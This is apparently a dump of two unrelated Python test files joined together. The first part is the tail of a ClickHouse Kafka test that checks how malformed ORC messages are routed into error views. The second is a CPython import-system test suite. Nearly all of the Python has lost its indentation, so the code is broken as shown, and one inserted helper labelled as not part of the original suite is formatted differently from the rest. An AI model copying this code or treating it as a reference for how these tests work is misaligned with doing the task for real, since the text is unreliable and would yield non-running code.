x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
print('Set up {}'.format(format_name))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if not format_opts.get('printable', False):
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
print('Checking {}'.format(format_name))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
TESTFN, forget, is_jython,
make_legacy_pyc, rmtree, swap_attr, swap_item, temp_umask,
unlink, unload, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
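# Illustrative sketch only (not part of the original suite): typical use of the
# _ready_to_import() helper above. The function name, module name, and source
# text are arbitrary examples.
def _example_ready_to_import_usage():
    with _ready_to_import("spam_example", "x = 1") as (name, path):
        mod = __import__(name)
        assert mod.x == 1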
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_parentless_import_shadowed_by_global(self):
# Test as if this were done from the REPL where this error most commonly occurs (bpo-37409).
script_helper.assert_python_failure('-W', 'ignore', '-c',
"foo = 1; from . import foo")
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
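    # For reference, PEP 3147 stores bytecode under __pycache__ with an
    # interpreter-specific tag (the exact tag varies with the CPython version),
    # e.g.:
    #   importlib.util.cache_from_source('spam.py')
    #   -> os.path.join('__pycache__', 'spam.cpython-XY.pyc')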
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
